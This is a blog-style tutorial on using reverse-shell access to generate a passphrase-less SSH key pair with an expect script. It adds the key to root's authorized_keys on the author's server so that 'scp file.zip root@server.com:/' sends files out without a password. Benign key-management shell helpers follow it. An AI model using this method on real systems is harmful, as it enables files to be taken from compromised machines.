Because of how the reverse shell in my last post works, most commands don't work if they take multiple lines or require a password, like scp. So to fix this, let's generate an RSA public and private key pair. Assuming you only have reverse shell access, you can download this script off a web server using curl -O:
#!/usr/bin/expect
# Drive ssh-keygen's interactive prompts so it runs without a terminal:
# accept the default key path, set an empty passphrase, then wait for
# the confirmation line and for ssh-keygen to exit.
spawn ssh-keygen -t rsa
expect "Enter file in which to save the key"
send "\r"
expect "Enter passphrase"
send "\r"
expect "Enter same passphrase again:"
send "\r"
expect "Your identification has"
expect eof
Make the script executable and run it (the #!/usr/bin/expect line hands it to expect, so run it as ./script rather than through bash); it will generate a key pair in /Users/username/.ssh. You want the public key, id_rsa.pub.
In your reverse shell, navigate to that directory, run "cat id_rsa.pub" and copy the output. Go onto your server and find the authorized SSH keys file. On Ubuntu it is "/root/.ssh/authorized_keys", so when logged onto my server I opened that file and appended the line from the cat command. Now you can run "scp file.zip root@server.com:/" and it will upload the file without asking for a password, and you can do it from the reverse shell. TA DA!

# Alternative: append the local public key to the remote authorized_keys in one step.
# This still prompts for the remote password once, so it needs a real terminal.
ssh remote-machine 'cat >> .ssh/authorized_keys' < .ssh/id_rsa.pub
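The same two steps (generate a key without prompts, then add it to authorized_keys) as an added shell example; this is not code from the original post. It swaps the expect script for ssh-keygen's own -N '' and -f flags, which need no terminal at all, and makes the authorized_keys append idempotent with the 700/600 permissions sshd's StrictModes checks before it will honour the file. The key paths, the sample key string and the list_keys helper (for reviewing what is currently authorized) are assumptions for the example.

```shell
#!/bin/sh
# Added example, not the post's own code. File paths below are assumptions.

# Generate a key pair with no prompts: -N '' sets an empty passphrase and -f the
# output path, so no expect script is needed. Skipped if ssh-keygen is absent.
gen_key() {
  keyfile="$1"
  command -v ssh-keygen >/dev/null 2>&1 || return 1
  ssh-keygen -q -t rsa -b 3072 -N '' -f "$keyfile" </dev/null
}

# Accept only a well-formed single-line public key: key type, base64 blob,
# optional comment. Anything else is rejected before it reaches the file.
valid_pubkey() {
  printf '%s\n' "$1" | grep -Eq '^(ssh-rsa|ssh-ed25519|ecdsa-sha2-nistp(256|384|521)) [A-Za-z0-9+/]+=*( [^[:cntrl:]]*)?$'
}

# Append a public key to an authorized_keys file exactly once, creating the
# directory and file with the permissions sshd requires.
# Returns 0 if added, 2 if already present, 1 if the key is malformed.
install_key() {
  pub="$1"; akfile="$2"
  valid_pubkey "$pub" || return 1
  dir=$(dirname "$akfile")
  mkdir -p "$dir" && chmod 700 "$dir"
  touch "$akfile" && chmod 600 "$akfile"
  # Compare on type + blob only, so a different comment is not a new key.
  blob=$(printf '%s\n' "$pub" | awk '{print $1" "$2}')
  if awk '{print $1" "$2}' "$akfile" | grep -Fxq "$blob"; then
    return 2
  fi
  printf '%s\n' "$pub" >> "$akfile"
}

# Summarise the keys currently authorized (line, type, blob prefix, comment)
# so an entry nobody recognises stands out during review.
list_keys() {
  awk '!/^#/ && NF>=2 {print NR": "$1" "substr($2,1,16)"... "$3}' "$1"
}

# Usage (constructed sample key, not a real one):
# install_key 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKx3nKm1kJ9m0z5x user@host' ~/.ssh/authorized_keys
# list_keys ~/.ssh/authorized_keys
```

Because install_key compares the key type and blob rather than the whole line, re-running it with a different comment does not grow the file, which keeps authorized_keys easy to review with list_keys.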